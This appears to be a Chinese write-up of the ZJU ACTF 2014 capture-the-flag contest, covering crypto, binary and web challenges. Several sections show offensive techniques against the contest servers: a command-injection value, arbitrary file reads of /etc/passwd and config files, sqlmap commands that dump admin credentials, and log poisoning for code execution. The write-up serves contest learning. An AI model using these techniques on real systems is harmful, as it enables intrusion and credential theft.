浙大2014ACTF L. WriteUp

0x00 RE Reverse0

说好的逆向题呢?

出题人还没吃早饭呢,你们急什么。出门左转,乖乖做Web题,OK不?

Flag:OK

0x01 古老 CRYPTO100

本题flag不在ACTF{}中

oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?

替换密码

git clone https://github.com/alexbers/substitution_cipher_solver.git cd cd substitution_cipher_solver/ cat "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?" > encrypted.txt ./decrypt.py Best key: ervglxyzohiqdsnbamfjpwkutc, bad_words 2 nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?

FLAG:cryptooosocoolamiright

0x02 餐前甜点 EXPLOIT100

nc 218.2.197.236 2009

crypto200.tar.gz

浙大2014ACTF L. WriteUp

栈溢出,覆盖执行game函数地址

浙大2014ACTF L. WriteUp

0x03 社工 MISC100

听说参加ACTF的?潘慷枷不渡咸??)

贴吧,全吧搜索ACTF,发现test帐号发出的Flag,当然,后来做题可能就要苦逼些;-)

浙大2014ACTF L. WriteUp

0x04 Flag之路 Web100

少年,不来一发么。http://218.2.197.236:2005/index.php

打开链接,提示Can you GET the way to flag?

查看源码,发现:

<!--way = "H4ck_F0r_Fun!GoGoGo!" -->

So,http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!

0x05 买不到票的怨念 CRYPTO200

买不到TI4的门票觉得人生好灰暗。。crypto200.tar.gz

参考有过类似题目的CTF,写脚本,解出Key

http://v0ids3curity.blogspot.com/2014/01/hack-you-ctf-2014-crypto-100-easy-one.html

得到的Key:DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo

去掉重复,为DoNotTryToGuessWhatDoesD3AdCa7ThinkOf

解出enc2的明文:

High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}

0x06 杀猪吃肉 EXPLOIT200

nc 218.2.197.236 2010 crypto200.tar.gz

程序拉进IDA里分析,会发现可识别四个指令:

killPig (注意有个空格)

浙大2014ACTF L. WriteUp

如果输入该指令,那么程序首先分配一8字节的内存空间,把地址放在cs:auth中。然后判断killPig 后面字符串的长度是否超过0x1E字节,如果不超过就把killPig 后面8字节字符串内容复制进去,超过就跳过该处理。

reset

浙大2014ACTF L. WriteUp

把cs:auth所存地址free

feedPig

浙大2014ACTF L. WriteUp

新申请一块内存放置feedPig后面字符串,地址放在cs:service里

EatIt

浙大2014ACTF L. WriteUp

很明显是取得key的指令了。但是它前面有个判断,如果cs:auth所存地址+0x20有内容,则回显key,否则跳过。

分析可知要点是让cs:auth所存地址+0x20有内容。

直接killPig +字符串不行,有长度限制。
出题人可能是要先killPig,reset把刚才申请的内存free掉,然后在feedPig重新利用那块地址,输入超过0x20字节的字符串达到目的。

但后来试了下只要killPig后面feedPIg,就会在第一个内存地址+0x20的地方重新分配内存,达到目的;-)

浙大2014ACTF L. WriteUp

0x07 讨厌的管理员 WEB200

FLAG在admin的手里!http://218.2.197.236:2005/web200/index.php

开始题目有Bug,任意用户密码得到返回页面
浙大2014ACTF L. WriteUp

返回Header头,发现Real地址,访问。只有管理员有,修改Cookie,admin=1

浙大2014ACTF L. WriteUp

得到Flag

浙大2014ACTF L. WriteUp

因为题目开始有Bug,起初跑偏,一直把重点放在登陆框的注入上,但是web100.admin表的username和password都没能跑出来数据,后来官方修补此Bug。

0x08 S4ndb0x MISC300

用比较费力的方法枚举,由于时间限制,Burp发包保持32s左右一次的频率,枚举出Flag

int main(int argc, char **argv, char *i) { return i=*++argv, i=i+0, *i - 'A'; }

ACTF{c6e49c9b897cc4dba15b39ec53bd8fd681937b8ae16833a24090f27d71d3f8c5}

0x09 喵喵喵喵 WEB300

管理员小陆搭了个服务器,但是好像漏洞蛮多哟。

http://218.2.197.236:2001/index.html

起初没发现什么信息,后来在About终于看到一个小小的:

This doubi web blog layout is provided by ./bc

访问bc目录,某链接存在任意文件读取,但过滤了..

<?php $url=$_GET['uuu']; $url=str_replace("..","",$url); $file = fopen("$url", "r") or exit("Unable to open file!"); //Output a line of the file until the end is reached while(!feof($file)) { echo fgets($file)." "; } fclose($file); ?>

读/etc/passwd发现HINT:x:500:500::/usr/share/ngInx/html:/bin/bash,得以读取网站目录login.php

浙大2014ACTF L. WriteUp

login.php存在类似SRUN3000命令执行,?gongwan=1|ls > /tmp/x,列出目录

浙大2014ACTF L. WriteUp

读取DBINFO得到flag

<?php $salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long $captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session $dbhost = "localhost"; $dbname = "FLAG"; // mysql database name $dbuser = "FLAG"; // mysql database username $dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password $pre = "onecms_"; // prefix for onecms tables ?>

0x0A 老大哥aay的秘密 CRYPTO400

老大哥aay给了你一个神秘文件,你看着办吧flag.rar

一个加密的RAR文件,能看到每个文件大小为5,且有CRC值

浙大2014ACTF L. WriteUp

将ACTF{保存为1.txt后加密压缩,发现CRC相同,确定思路,暴力枚举CRC

#include <windows.h> #include <stdio.h> //crc32.h #ifndef _CRC32_H #define _CRC32_H UINT crc32( UCHAR *buf, int len); #endif static UINT CRC32[256]; static char init = 0; //初始化表 static void init_table() { int i,j; UINT crc; for(i = 0;i < 256;i++) { crc = i; for(j = 0;j < 8;j++) { if(crc & 1) { crc = (crc >> 1) ^ 0xEDB88320; } else { crc = crc >> 1; } } CRC32[i] = crc; } } //crc32实现函数 UINT crc32( UCHAR *buf, int len) { UINT ret = 0xFFFFFFFF; int i; if( !init ) { init_table(); init = 1; } for(i = 0; i < len;i++) { ret = CRC32[((ret & 0xFF) ^ buf[i])] ^ (ret >> 8); } ret = ~ret; return ret; } int main() { char ss[]="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! "; char sss[6]={0}; int a,b,c,d,e; int _crc32 = 0; for(a=0; a<strlen(ss); a++) { for(b=0; b<strlen(ss); b++) { for(c=0; c<strlen(ss); c++) { for(d=0; d<strlen(ss); d++) { for(e=0; e<strlen(ss); e++) { sss[0] = ss[a]; sss[1] = ss[b]; sss[2] = ss[c]; sss[3] = ss[d]; sss[4] = ss[e]; _crc32 = crc32((UCHAR *)sss, 5); if(_crc32 == 0xCA2AA4DE) { printf("%s\n", sss); system("PAUSE"); } } } } } } return 0; }

CRC存在碰撞,好在根据语意可确定最后Flag

0x0B 赞助商 MISC400

你大家快来看赞助商!hidden.png

下载图片后ps处理下,二维码的形状已经很清晰了,对比官网图片,除却二维码像素相同,python对比生成二维码

浙大2014ACTF L. WriteUp

二维码为Version3 29*29,二维码三角即可,但此图片右下角仍缺少一行一列,有2^17种可能

当时真的生成了这17w二维码文件并使用脚本批量扫描,由于脚本的原因没有得到扫描结果,在此过程中学习二维码结构

结构参考:http://en.wikipedia.org/wiki/QR_code

右下角有一个位置确认标志,不影响扫描数据,可设置为黑(1),排除9点,剩下2^8即256种可能,批量生成:

#!/usr/bin/env python # -*- coding:utf-8 -*- import string from PIL import Image def showQRCode(fpath,bit,a): bmp = Image.open(fpath) bmp2 = Image.open('logo.jpg') pix = bmp.load() pix2 = bmp2.load() w, h = bmp.size w2, h2 = bmp2.size i=0 for x in xrange(0, w): for y in xrange(0, h): if pix[x,y] == pix2[x,y]: pix[x,y] = (255,255,255) else: pix[x,y] = (0,0,0) if (x ==21 and y>=21 and y<=25) or (x>=21 and x<=25 and y==21 ): pix[x, y] = (0, 0, 0) if (x ==21 and y>=26 and y<=29) or (x>=26 and x<=29 and y==21 ): if int(bit[i])==0: pix[x, y] = (255, 255, 255) else: pix[x, y] = (0, 0, 0) i+=1 bmp.save('test'+a+'.png') if __name__ == "__main__": for a in open('passdic.list','rU'): a=a.rstrip() flagHex = showQRCode("hidden.png",a,a)

后批量识别又没有收获,此时也是凌晨,就拿起SmartPhone无力的挨个扫,一遍过去,没结果,又来一遍,终于在肌无力时扫了出来!如果直接测试找个可靠的识别脚本批量处理会更好。

识别的文件为test11010100

0x0C 贡丸酱 WEB400

web300没做出来的话这题做出来的希望不大,你以为你是可爱的贡丸酱么( つ•̀ω•́)つ

(贡丸酱到底算不算提示呢)

(web300和web400都不需要使用扫描器)

(本题flag并不是ACTF形式的,你提交的flag中也不需要包含任何形式的括号)

http://218.2.197.236:2003

现在可以公开的情报:

管理员是个很懒的人,他的笔记几乎没有任何废话。

根据提示,通过web300的命令执行&文件读取发现这样的笔记

浙大2014ACTF L. WriteUp

访问Web400此地址

浙大2014ACTF L. WriteUp

根据笔记信息基本可以存在injection,根据这页面的样子又一次跑偏到Mangodb上,经过艰苦的过程终于想到那个Base4不是告诉我们gw,而是提示注入!--

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 -D raw_admin -T admin --dump Database: raw_admin Table: admin [3 entries] +--------------------+-----------------+ | login | password | +--------------------+-----------------+ | gw | gongwandaiskkkk | | Fuckingluyuhao.php | 906239288 | | luyuhaoxiaodaibi | luyuhaodadaibi | +--------------------+-----------------+

跑出这些信息,知906239288为笔记中的女神。

百度发现http://www.baidu.com/p/%E8%92%B2%E8%91%B5%E9%A6%99%E7%AF%86301?from=zhidao,无甚收获

微博有信息

浙大2014ACTF L. WriteUp

故,后门:http://218.2.197.236:2003/Fuckingluyuhao.php 密码wangbiyun

alias后门,可能放到/var/tmp/下

浙大2014ACTF L. WriteUp

得到Flag

0x0D 丧心病狂的黑客 WEB500

管理员小陆搭的服务器被人日穿了(见web300),小陆被boss骂了个狗血淋头。然后boss勒令小陆再搭一遍,小陆在某内网换了个架构(原架构是nginx)又搭了一遍web300的站,修补了部分漏洞。boss和小陆都是那台服务器的用户,这样boss发现小陆又写出漏洞代码就会及时记录在服务器上。

接受挑战,hackers,日穿这台位置未知的内网服务器!!!

(本题和之前的web题有紧密联系!!!)

(部分关键文件每十分钟重置一次!!!)

(本题flag不包含有ACTF字样,不包含有任何括号!!!)

(Drink All The Booze , Hack All The Things!!!)

第一步先确定服务器位置

根据提示,可以猜到和WEB300有关

依靠WEB300漏洞,整理WEB300服务器信息如下

Linux gamebox 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux eth0 Link encap:Ethernet HWaddr 00:0C:29:7A:61:32 inet addr:172.17.1.2 Bcast:172.17.1.7 Mask:255.255.255.248 inet6 addr: fe80::20c:29ff:fe7a:6132/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:8322561 errors:0 dropped:0 overruns:0 frame:0 TX packets:7889370 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:969748319 (924.8 MiB) TX bytes:9273711147 (8.6 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:13053905 errors:0 dropped:0 overruns:0 frame:0 TX packets:13053905 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:41653303424 (38.7 GiB) TX bytes:41653303424 (38.7 GiB) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2130/nginx tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:55129 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 515/php-fpm tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 :::51855 :::* LISTEN - tcp 0 0 :::111 :::* LISTEN - tcp 0 0 :::22 :::* LISTEN - tcp 0 0 ::1:631 :::* LISTEN - tcp 0 0 ::1:25 :::* LISTEN - udp 0 0 0.0.0.0:111 0.0.0.0:* - udp 0 0 0.0.0.0:631 0.0.0.0:* - udp 0 0 0.0.0.0:636 0.0.0.0:* - udp 0 0 0.0.0.0:895 0.0.0.0:* - udp 0 0 0.0.0.0:45324 0.0.0.0:* - udp 0 0 0.0.0.0:914 0.0.0.0:* - udp 0 0 0.0.0.0:68 0.0.0.0:* - udp 0 0 :::111 :::* - udp 0 0 :::37369 :::* - udp 0 0 :::895 :::* - raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - raw 0 1080 0.0.0.0:1 0.0.0.0:* 7 - raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - Active UNIX domain sockets (only servers) Proto RefCnt Flags Type State I-Node PID/Program name Path unix 2 [ ACC ] STREAM LISTENING 11013 - @/var/run/hald/dbus-J7oPQkOOJW unix 2 [ ACC ] STREAM LISTENING 10583 - /var/run/rpcbind.sock unix 2 [ ACC ] STREAM LISTENING 7281 - @/com/ubuntu/upstart unix 2 [ ACC ] STREAM LISTENING 10856 - /var/run/dbus/system_bus_socket unix 2 [ ACC ] STREAM LISTENING 10917 - /var/run/cups/cups.sock unix 2 [ ACC ] STREAM LISTENING 10977 - /var/run/acpid.socket unix 2 [ ACC ] STREAM LISTENING 12567 - public/cleanup unix 2 [ ACC ] STREAM LISTENING 11008 - @/var/run/hald/dbus-6ghIWFnai8 unix 2 [ ACC ] STREAM LISTENING 12574 - private/tlsmgr unix 2 [ ACC ] STREAM LISTENING 12578 - private/rewrite unix 2 [ ACC ] STREAM LISTENING 12582 - private/bounce unix 2 [ ACC ] STREAM LISTENING 12586 - private/defer unix 2 [ ACC ] STREAM LISTENING 12590 - private/trace unix 2 [ ACC ] STREAM LISTENING 12594 - private/verify unix 2 [ ACC ] STREAM LISTENING 12598 - public/flush unix 2 [ ACC ] STREAM LISTENING 12602 - private/proxymap unix 2 [ ACC ] STREAM LISTENING 12606 - private/proxywrite unix 2 [ ACC ] STREAM LISTENING 12610 - private/smtp unix 2 [ ACC ] STREAM LISTENING 12614 - private/relay unix 2 [ ACC ] STREAM LISTENING 12618 - public/showq unix 2 [ ACC ] STREAM LISTENING 12622 - private/error unix 2 [ ACC ] STREAM LISTENING 12626 - private/retry unix 2 [ ACC ] STREAM LISTENING 12630 - private/discard unix 2 [ ACC ] STREAM LISTENING 12634 - private/local unix 2 [ ACC ] STREAM LISTENING 12638 - private/virtual unix 2 [ ACC ] STREAM LISTENING 12642 - private/lmtp unix 2 [ ACC ] STREAM LISTENING 12646 - private/anvil unix 2 [ ACC ] STREAM LISTENING 12650 - private/scache unix 2 [ ACC ] STREAM LISTENING 12346 - /var/lib/mysql/mysql.sock unix 2 [ ACC ] STREAM LISTENING 12725 - /var/run/abrt/abrt.socket root pts/2 zhutou-centos-1- Sun Apr 6 01:34 - 01:34 (00:00) root pts/1 222.205.110.239 Sat Apr 5 12:53 still logged in root pts/1 222.205.110.239 Sat Apr 5 12:12 - 12:13 (00:01) root pts/1 222.205.110.239 Sat Apr 5 12:09 - 12:11 (00:01) root pts/0 zhutou-centos-1- Sat Apr 5 12:07 - 17:16 (05:08) root pts/0 222.205.110.239 Sat Apr 5 10:07 - 10:08 (00:01) reboot system boot 2.6.32-431.el6.x Sat Apr 5 09:36 - 02:19 (16:42) ARP -e Address HWtype HWaddress Flags Mask Iface zhutou-centos-1-gw ether 00:0c:29:03:c2:e2 C eth0 zhutou-centos-2 ether 00:0c:29:b6:4e:b8 C eth0 172.17.1.5 (incomplete) eth0 Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 172.17.1.0 * 255.255.255.248 U 0 0 0 eth0 link-local * 255.255.0.0 U 1002 0 0 eth0 default zhutou-centos-1 0.0.0.0 UG 0 0 0 eth0

基本可确定zhutou-centos-2就是目标机器,ping -c 4 zhutou-centos-2 得到ip为172.17.1.3

PING zhutou-centos-2 (172.17.1.3) 56(84) bytes of data. 64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=1 ttl=64 time=0.153 ms 64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=2 ttl=64 time=0.166 ms 64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=3 ttl=64 time=0.192 ms 64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=4 ttl=64 time=0.170 ms

通过curl命令访问172.17.1.3上的任意文件读取,漏洞依然存在,但命令执行已被删除。做此题时相对较晚,重定向到/tmp目录的临时文件总被脚本删除,浪费了些许时间。

因架构换为Apache,继续收集信息

查看access.log历史记录,提取出fuckti0n.php请求,读取文件内容

<?php if ($_GET[page]) { include $_GET[page]; } else { include "home.php"; } ?>

一个任意文件包含,看看php.ini

disable_functions = allow_url_fopen = On allow_url_include = Off

不能远程包含文件。查看/etc/passwd,多了一行

boss:x:500:500::/var/www/boss:/bin/bash

可以猜到flag应该在boss目录下,但需要命令执行才能ls到,此时可影响的文件只有日志,故借助日志构造命令执行并由fuckti0n.php包含执行

浙大2014ACTF L. WriteUp

列出目录后读取文件内容

浙大2014ACTF L. WriteUp

浙大2014ACTF L. WriteUp

CX是何方女神,fxxk`

其他题目未能解出,坐等WannaBe

{ACTF WriteUp By L. @XDSEC.ORG}

分类:默认分类 时间:2015-03-02 人气:2
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.051 (s). 10 q(s)